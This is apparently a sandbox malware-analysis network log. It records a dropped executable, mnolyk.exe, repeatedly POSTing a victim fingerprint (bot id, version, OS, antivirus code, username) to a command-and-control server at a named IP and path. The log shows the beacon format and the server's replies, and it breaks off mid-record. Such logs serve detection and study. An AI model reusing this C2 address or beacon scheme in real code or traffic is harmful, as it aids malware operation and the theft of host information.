                                                                    Date: Wed, 08 Feb 2023 20:32:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    293 | 192.168.2.3 | 49995 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:40.808312893 CET | 493 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:40.874547005 CET | 493 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    294 | 192.168.2.3 | 49996 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:41.048048019 CET | 494 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:41.114902020 CET | 494 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    295 | 192.168.2.3 | 49997 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:41.295556068 CET | 495 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:41.362737894 CET | 495 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    296 | 192.168.2.3 | 49998 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:41.540596962 CET | 496 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:41.604485989 CET | 496 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    297 | 192.168.2.3 | 49999 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:41.775058031 CET | 497 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:41.838279009 CET | 497 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    298 | 192.168.2.3 | 50000 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:42.011738062 CET | 498 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:42.077291012 CET | 498 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    299 | 192.168.2.3 | 50001 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:42.251605034 CET | 499 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:42.315658092 CET | 499 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    3 | 192.168.2.3 | 49704 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:10.105006933 CET | 196 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:10.172152042 CET | 204 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    30 | 192.168.2.3 | 49732 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:24.105231047 CET | 231 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:24.170511961 CET | 231 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    300 | 192.168.2.3 | 50002 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:43.509977102 CET | 500 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:43.573843956 CET | 500 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    301 | 192.168.2.3 | 50003 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:43.753417015 CET | 501 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:43.817357063 CET | 501 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    302 | 192.168.2.3 | 50004 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:43.995455027 CET | 502 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:44.062264919 CET | 502 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    303 | 192.168.2.3 | 50005 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:44.235622883 CET | 503 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:44.300940037 CET | 503 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    304 | 192.168.2.3 | 50006 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:44.479967117 CET | 504 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:44.543730974 CET | 504 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    305 | 192.168.2.3 | 50007 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:44.713026047 CET | 505 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:44.776062965 CET | 505 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    306 | 192.168.2.3 | 50008 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:44.947787046 CET | 506 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:45.012370110 CET | 506 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    307 | 192.168.2.3 | 50009 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:45.194375038 CET | 507 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:45.261404037 CET | 507 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    308 | 192.168.2.3 | 50010 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:45.438687086 CET | 508 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:45.537972927 CET | 508 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    309 | 192.168.2.3 | 50011 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:45.719027042 CET | 509 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:45.784312963 CET | 509 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    31 | 192.168.2.3 | 49733 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:24.349654913 CET | 232 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:24.413149118 CET | 232 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    310 | 192.168.2.3 | 50012 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:45.968971014 CET | 510 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:46.034311056 CET | 510 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
